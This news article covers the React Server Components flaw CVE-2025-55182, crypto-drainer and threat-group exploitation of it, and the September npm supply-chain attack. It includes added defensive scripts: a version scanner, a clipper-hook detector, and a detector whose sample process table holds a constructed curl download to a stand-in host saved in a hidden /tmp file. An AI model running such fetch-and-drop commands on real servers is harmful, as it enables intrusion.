
Major JavaScript Library Breach Puts All Crypto Websites at Risk


A critical security flaw in React Server Components has prompted urgent warnings across the crypto industry, as threat actors are rapidly exploiting it to drain wallets and deploy malware.

Security Alliance announced that crypto-drainers are actively weaponizing CVE-2025-55182, urging all websites to review their front-end code immediately for suspicious assets.

The vulnerability affects not only Web3 protocols but every website built on React, with attackers targeting permit signatures across platforms.

Users face immediate danger when signing any transaction, as malicious code intercepts wallet communications and redirects funds to attacker-controlled addresses.

Critical Flaw Enables Remote Code Execution

React’s official team disclosed CVE-2025-55182 on December 3, rating it CVSS 10.0, following Lachlan Davidson’s November 29 report through the Meta Bug Bounty program.

The unauthenticated remote code execution vulnerability lies in how React decodes payloads sent to Server Function endpoints, allowing attackers to craft malicious HTTP requests that execute arbitrary code on the server.

The flaw affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0 across the react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack packages.

Major frameworks, including Next.js, React Router, Waku, and Expo, require immediate updates. Patches arrived in versions 19.0.1, 19.1.2, and 19.2.1, with Next.js users needing upgrades across multiple release lines, from 14.2.35 through 16.0.10.
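The first check a team needs after reading the version list above is whether any copy of the three packages in its dependency tree is at an affected version. The script below is an added example written for this article; it is not code from React, Vercel or Security Alliance. It walks the `packages` map of a parsed npm `package-lock.json` (lockfile version 2 or 3), including nested copies under other packages, and reports exact matches against the versions the article names; pre-release builds of the same packages are not in that list, so they are reported for manual review instead. The lockfile embedded at the bottom is constructed for a stand-alone run.

```javascript
// Added example, not code from the article, React or Vercel: scan a parsed
// npm package-lock.json (lockfileVersion 2 or 3) for react-server-dom-* at the
// versions the article lists as affected by CVE-2025-55182.

// Packages and affected versions named in the article.
const AFFECTED_PACKAGES = new Set([
  'react-server-dom-webpack',
  'react-server-dom-parcel',
  'react-server-dom-turbopack',
]);
const AFFECTED_VERSIONS = new Set(['19.0.0', '19.1.0', '19.1.1', '19.2.0']);

// Split "19.2.0-canary-xyz+build" into a three-part core ("19.2.0") and the
// pre-release tag, padding short versions such as "19.0" to "19.0.0".
function parseVersion(v) {
  const [coreAndPre] = String(v).split('+'); // drop build metadata
  const [core, ...pre] = coreAndPre.split('-');
  const parts = core.split('.').map((n) => parseInt(n, 10) || 0);
  while (parts.length < 3) parts.push(0);
  return { core: parts.slice(0, 3).join('.'), prerelease: pre.join('-') };
}

// Lockfile keys look like "node_modules/react-server-dom-webpack" or, for a
// nested copy, "node_modules/some-tool/node_modules/react-server-dom-webpack".
function packageNameFromPath(lockPath) {
  const idx = lockPath.lastIndexOf('node_modules/');
  return idx < 0 ? null : lockPath.slice(idx + 'node_modules/'.length);
}

// Returns one finding per affected or pre-release copy found in the lockfile.
function findVulnerableEntries(lockfile) {
  const findings = [];
  for (const [lockPath, entry] of Object.entries(lockfile.packages || {})) {
    const name = packageNameFromPath(lockPath);
    if (!name || !AFFECTED_PACKAGES.has(name) || !entry.version) continue;
    const { core, prerelease } = parseVersion(entry.version);
    if (prerelease) {
      findings.push({ path: lockPath, name, version: entry.version, status: 'review' });
    } else if (AFFECTED_VERSIONS.has(core)) {
      findings.push({ path: lockPath, name, version: core, status: 'affected' });
    }
  }
  return findings;
}

// Constructed sample lockfile for a stand-alone run (not a real project).
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '0.1.0' },
    'node_modules/react': { version: '19.2.0' },
    'node_modules/react-server-dom-webpack': { version: '19.2.0' },
    'node_modules/build-tool/node_modules/react-server-dom-parcel': { version: '19.1.2' },
    'node_modules/react-server-dom-turbopack': { version: '19.0' },
    'node_modules/experimental/node_modules/react-server-dom-webpack': {
      version: '19.2.0-canary-abc123-20251101',
    },
  },
};

for (const f of findVulnerableEntries(SAMPLE_LOCKFILE)) {
  console.log(`${f.status.padEnd(8)} ${f.name}@${f.version}  (${f.path})`);
}
```

To run it against a real project, pass `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` to `findVulnerableEntries` instead of the sample. One caveat: Next.js ships its own compiled copy of react-server-dom-webpack inside the `next` package, so a clean result here does not clear a Next.js application; the `next` entry itself must be at one of the patched releases the article names.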

Unfortunately, the researchers have again detected two major new flaws.

Vercel deployed Web Application Firewall rules to automatically protect projects on its platform, though the company emphasized that WAF protection alone remains insufficient.

“Immediate upgrades to a patched version are required,” Vercel said in its December 3 security bulletin, adding that the vulnerability affects applications that process untrusted input in ways that enable remote code execution.

Multiple Threat Groups Launch Coordinated Attacks

Google Threat Intelligence Group documented widespread attacks beginning on December 3, tracking criminal groups ranging from opportunistic hackers to government-backed operations.

Chinese hacking groups installed various types of malware on compromised systems, primarily targeting cloud servers on Amazon Web Services and Alibaba Cloud.

These attackers employed sophisticated techniques to maintain long-term access to victim systems.

Some groups installed software that creates covert tunnels for remote control, while others deployed programs that continuously download additional malicious tools disguised as legitimate files. The malware hides in system folders and automatically restarts to evade detection.

Several groups disguised malicious software as popular programs or used legitimate cloud services, such as Cloudflare Pages and GitLab, to hide their communications.

Financially motivated criminals joined the attack wave starting on December 5, installing crypto-mining software that secretly uses victims’ computing power to generate Monero.

These miners run constantly in the background, driving up electricity costs while generating revenue for attackers. Underground hacking forums quickly filled with discussions sharing attack tools and exploitation experiences.

Historic Supply Chain Attack Pattern Continues

The React vulnerability follows a September 8 attack in which hackers compromised Josh Goldberg’s npm account and published malicious updates to 18 widely used packages, including chalk, debug, and strip-ansi.

These utilities collectively account for over 2.6 billion weekly downloads, and researchers discovered crypto-clipper malware that intercepts browser functions to swap legitimate wallet addresses with attacker-controlled ones.
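The clipper behaviour described here, and the wallet-communication interception described earlier in the article, both rely on replacing browser functions with wrappers that rewrite addresses. The code below is an added example written for this article, not code from the article, from any wallet vendor or from the affected packages, and it shows two defensive checks a dapp can run: a test of whether critical globals are still the engine's native implementations, and a guard that refuses to send `eth_sendTransaction` to any recipient the application did not itself select. It runs under Node with a constructed scope and a constructed provider; in a browser the same functions would be given `globalThis` and `window.ethereum`. The addresses are constructed placeholders.

```javascript
// Added example, not code from the article or any wallet vendor: detect
// replaced browser APIs of the kind a crypto-clipper hooks, and pin the
// recipient of a transaction before it reaches the wallet provider.

// True only when the function's source is the engine's own implementation.
// Function.prototype.toString is called directly so that a replaced
// fn.toString cannot answer on the function's behalf. Bound functions also
// print "[native code]", so they are rejected by their "bound " name prefix.
function isNativeFunction(fn) {
  if (typeof fn !== 'function') return false;
  if (typeof fn.name === 'string' && fn.name.startsWith('bound ')) return false;
  return /\{\s*\[native code\]\s*\}\s*$/.test(Function.prototype.toString.call(fn));
}

// Resolve dotted paths such as "XMLHttpRequest.prototype.open" inside `scope`
// and return the paths whose target is no longer a native function.
function findPatchedApis(scope, paths) {
  return paths.filter((p) => {
    const target = p.split('.').reduce((o, k) => (o == null ? undefined : o[k]), scope);
    return !isNativeFunction(target);
  });
}

// Recipient check for an EIP-1193 style request object.
function recipientAllowed(args, allowedLowercase) {
  const tx = args.params && args.params[0];
  const to = String((tx && tx.to) || '').toLowerCase();
  return allowedLowercase.has(to);
}

// Wrap a provider's request() so eth_sendTransaction can only target recipients
// the application chose; a swapped address is rejected before signing.
function makeGuardedRequest(provider, allowedRecipients) {
  const allowed = new Set(allowedRecipients.map((a) => a.toLowerCase()));
  return async function guardedRequest(args) {
    if (args.method === 'eth_sendTransaction' && !recipientAllowed(args, allowed)) {
      throw new Error('recipient is not one the application selected');
    }
    return provider.request(args);
  };
}

// Constructed scope: JSON.parse and String.prototype.replace are real natives;
// `fetch` is a plain JS wrapper standing in for a hooked function.
const SAMPLE_SCOPE = {
  JSON: { parse: JSON.parse },
  fetch: function fetch(url, init) { return { url, init }; },
  String: { prototype: { replace: String.prototype.replace } },
};

// Constructed provider that only records what it was asked to do.
const SAMPLE_PROVIDER = {
  calls: [],
  async request(args) { this.calls.push(args); return '0xconstructedtxhash'; },
};

// Constructed placeholder addresses, not real accounts.
const INTENDED = '0x1111111111111111111111111111111111111111';
const SWAPPED = '0x2222222222222222222222222222222222222222';

async function demo() {
  const patched = findPatchedApis(SAMPLE_SCOPE, ['JSON.parse', 'fetch', 'String.prototype.replace']);
  const request = makeGuardedRequest(SAMPLE_PROVIDER, [INTENDED]);
  const sent = await request({ method: 'eth_sendTransaction', params: [{ to: INTENDED, value: '0x1' }] });
  let blocked = null;
  try {
    await request({ method: 'eth_sendTransaction', params: [{ to: SWAPPED, value: '0x1' }] });
  } catch (e) {
    blocked = e.message;
  }
  return { patched, sent, blocked, providerCalls: SAMPLE_PROVIDER.calls.length };
}

demo().then((r) => console.log(JSON.stringify(r, null, 2)));
```

Both checks are signals rather than proof. Legitimate polyfills and browser extensions also wrap globals, so a non-native `fetch` needs investigation rather than an automatic block, and a script that loads before yours can replace `Function.prototype.toString` as well, which is why this belongs alongside subresource integrity and a lockfile audit rather than in place of them. The recipient guard enforces the article's advice to verify before signing on the application side; the wallet's own confirmation screen remains the final check.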

Ledger CTO Charles Guillemet described that incident as a “large-scale supply chain attack,” advising users without hardware wallets to avoid on-chain transactions.

The attackers gained access through phishing campaigns impersonating npm support, claiming accounts would be locked unless two-factor authentication credentials were updated by September 10.

Global Ledger data shows hackers stole over $3 billion across 119 incidents in the first half of 2025, with 70% of breaches involving funds being moved before they became public.

Only 4.2% of stolen assets were recovered, as laundering now takes seconds rather than hours.

For now, organizations using React or Next.js are advised to patch immediately to versions 19.0.1, 19.1.2, or 19.2.1, deploy WAF rules, audit all dependencies, monitor network traffic for wget or cURL commands initiated by web server processes, and hunt for unauthorized hidden directories or malicious shell configuration injections.
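One of the hunting steps above, wget or cURL launched by a web server process, can be checked from a process listing. The script below is an added example written for this article, not code from the article, from Google or from any vendor. It parses the text produced by `ps -eo pid,ppid,user,comm,args`, walks each curl or wget process up its parent chain, and reports those whose ancestry leads back to a web server process. The list of server process names (`node`, `next-server`) is an assumption to adjust for your deployment, and the process table at the bottom is constructed, not captured from a real host.

```javascript
// Added example, not from the article: detect curl/wget processes whose parent
// chain leads to a web server process, using `ps -eo pid,ppid,user,comm,args`.

const DOWNLOADER_COMMS = new Set(['curl', 'wget']);
// Assumed process names for the web tier; adjust for your own deployment.
const WEB_SERVER_COMM_PREFIXES = ['node', 'next-server'];

// pid, ppid, user, comm, then the full argument string.
const PS_LINE = /^\s*(\d+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(.*)$/;

// Parse ps output into a Map keyed by pid; the header line does not match.
function parsePs(text) {
  const procs = new Map();
  for (const line of text.split('\n')) {
    const m = PS_LINE.exec(line);
    if (!m) continue;
    const [, pid, ppid, user, comm, args] = m;
    procs.set(Number(pid), { pid: Number(pid), ppid: Number(ppid), user, comm, args: args.trim() });
  }
  return procs;
}

function isWebServerProcess(proc) {
  return WEB_SERVER_COMM_PREFIXES.some((p) => proc.comm.startsWith(p));
}

// Walk up the parent chain and return the first web server ancestor, if any.
// The visited set guards against a malformed table with a parent cycle.
function webServerAncestor(procs, proc) {
  const seen = new Set();
  let cur = procs.get(proc.ppid);
  while (cur && !seen.has(cur.pid)) {
    if (isWebServerProcess(cur)) return cur;
    seen.add(cur.pid);
    cur = procs.get(cur.ppid);
  }
  return null;
}

// One finding per downloader that descends from a web server process.
function findDownloadersSpawnedByWebServer(psText) {
  const procs = parsePs(psText);
  const findings = [];
  for (const proc of procs.values()) {
    if (!DOWNLOADER_COMMS.has(proc.comm)) continue;
    const origin = webServerAncestor(procs, proc);
    if (origin) {
      findings.push({ pid: proc.pid, user: proc.user, args: proc.args, viaPid: origin.pid, viaComm: origin.comm });
    }
  }
  return findings;
}

// Constructed ps output (not from a real host). PID 902 is curl started from a
// shell that the node web server spawned; PID 960 is an operator's curl from
// a login shell and should not be reported.
const SAMPLE_PS = `
    PID    PPID USER     COMMAND         COMMAND
      1       0 root     systemd         /sbin/init
    842       1 www-data node            node server.js
    901     842 www-data sh              sh -c curl -fsSL http://example.invalid/file -o /tmp/.cache
    902     901 www-data curl            curl -fsSL http://example.invalid/file -o /tmp/.cache
    950       1 deploy   bash            -bash
    960     950 deploy   curl            curl -I https://registry.npmjs.org/
`;

for (const f of findDownloadersSpawnedByWebServer(SAMPLE_PS)) {
  console.log(`pid ${f.pid} (${f.user}) via ${f.viaComm}[${f.viaPid}]: ${f.args}`);
}
```

On a live host, capture `ps -eo pid,ppid,user,comm,args` and pass the text to `findDownloadersSpawnedByWebServer`. A process snapshot only sees downloads that are still running, so for durable coverage the same parent-chain logic should be applied to exec events from auditd or an EDR, where the parent pid is recorded for every short-lived process.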

The post Major JavaScript Library Breach Puts All Crypto Websites at Risk appeared first on Cryptonews.
